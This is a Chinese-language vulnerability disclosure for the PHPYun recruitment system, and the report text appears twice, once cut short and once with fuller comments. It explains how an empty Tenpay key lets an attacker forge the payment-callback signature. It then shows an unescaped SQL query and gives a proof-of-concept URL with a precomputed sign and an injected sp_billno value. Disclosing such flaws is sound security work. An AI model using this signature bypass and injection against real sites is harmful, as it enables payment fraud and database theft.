### 简要描述: php云人才系统 注入漏洞 ### 详细说明: php云人才系统 注入漏洞 tenpay的KEY没有初始化 导致的注入漏洞! ``` /api/tenpay/return_url.php require_once(dirname(dirname(dirname(__FILE__)))."/data/db.config.php"); require_once(dirname(dirname(dirname(__FILE__)))."/include/mysql.class.php"); $db = new mysql($db_config['dbhost'], $db_config['dbuser'], $db_config['dbpass'], $db_config['dbname'], ALL_PS, $db_config['charset']); /* 密钥 */ $key =$tenpay[sy_tenpaycode]; //密钥没有定义 ========= tenpay_data.php <?php /* * Created on 2012 * Link for shyflc@qq.com * This PHPYun.Rencai System Powered by PHPYun.com */ $tenpaydata=array("sy_weburl"=>"http://www.job.com","sy_tenpayid"=>"","sy_tenpaycode"=>"")//没有定义KEY 所以是空~~ ; ?> ========= /* 创建支付应答对象 */ $resHandler = new PayResponseHandler(); $resHandler->setKey($key);//还是key没有初始化~~ //判断签名 if($resHandler->isTenpaySign()) {//验证过程 /**********************************3 function isTenpaySign() { $cmdno = $this->getParameter("cmdno"); $pay_result = $this->getParameter("pay_result"); $date =...
### 简要描述: php云人才系统 注入漏洞 ### 详细说明: php云人才系统 注入漏洞：tenpay 的 KEY 没有初始化，签名校验可被绕过，进而导致 SQL 注入漏洞！ ``` /api/tenpay/return_url.php require_once(dirname(dirname(dirname(__FILE__)))."/data/db.config.php"); require_once(dirname(dirname(dirname(__FILE__)))."/include/mysql.class.php"); $db = new mysql($db_config['dbhost'], $db_config['dbuser'], $db_config['dbpass'], $db_config['dbname'], ALL_PS, $db_config['charset']); /* 密钥 */ $key =$tenpay[sy_tenpaycode]; //密钥没有定义（此处读取的是 $tenpay，而 tenpay_data.php 中定义的数组名为 $tenpaydata；即便对应上，sy_tenpaycode 的值也为空） ========= tenpay_data.php <?php /* * Created on 2012 * Link for shyflc@qq.com * This PHPYun.Rencai System Powered by PHPYun.com */ $tenpaydata=array("sy_weburl"=>"http://www.job.com","sy_tenpayid"=>"","sy_tenpaycode"=>"")//没有定义KEY 所以是空~~ ; ?> ========= /* 创建支付应答对象 */ $resHandler = new PayResponseHandler(); $resHandler->setKey($key);//还是key没有初始化~~ //判断签名 if($resHandler->isTenpaySign()) {//验证过程 /**********************************3 function isTenpaySign() { $cmdno = $this->getParameter("cmdno"); $pay_result = $this->getParameter("pay_result"); $date = $this->getParameter("date"); $transaction_id = $this->getParameter("transaction_id"); $sp_billno = $this->getParameter("sp_billno"); $total_fee = $this->getParameter("total_fee"); $fee_type = $this->getParameter("fee_type"); $attach = $this->getParameter("attach"); $key = $this->getKey(); $signPars = ""; //组织签名串 $signPars = "cmdno=" . $cmdno . "&" . "pay_result=" . $pay_result . "&" . "date=" . $date . "&" . "transaction_id=" . $transaction_id . "&" . "sp_billno=" . $sp_billno . "&" . "total_fee=" . $total_fee . "&" . "fee_type=" . $fee_type . "&" . "attach=" . $attach . "&" . "key=" . 
$key; $sign = strtolower(md5($signPars));//key 是空，其他参数都可控，我们自己就可以算出 sign，所以在没有设置 key 的时候验证形同虚设 ***********************************/ //交易单号 $transaction_id = $resHandler->getParameter("transaction_id"); //本站单号 $sp_billno = $resHandler->getParameter("sp_billno"); //金额,以分为单位 $total_fee = $resHandler->getParameter("total_fee"); //支付结果 $pay_result = $resHandler->getParameter("pay_result"); //类型 $attach = $resHandler->getParameter("attach"); if( "0" == $pay_result ) { //------------------------------ //处理业务开始 //------------------------------ //注意交易单不要重复处理 //注意判断返回金额 //处理本站信息开始（$sp_billno 直接拼接进 SQL，未做转义或参数化，即注入点） echo "select * from `".$db_config["def"]."company_order` where `order_id`='$sp_billno'"; $sql=$db->query("select * from `".$db_config["def"]."company_order` where `order_id`='$sp_billno'"); $row=mysql_fetch_array($sql); ``` ### 漏洞证明: 测试方法 http://127.0.0.1/yun3/api/tenpay/return_url.php?sign=ba7b763f604fb46432eac7fb601c55c1&sp_billno=1%27&pay_result=0 [![QQ截图20131122173445.jpg](https://images.seebug.org/upload/201311/22174047d7b1300aa8b4cb2ab4c0ff13d0fe5f89.jpg)](https://images.seebug.org/upload/201311/22174047d7b1300aa8b4cb2ab4c0ff13d0fe5f89.jpg)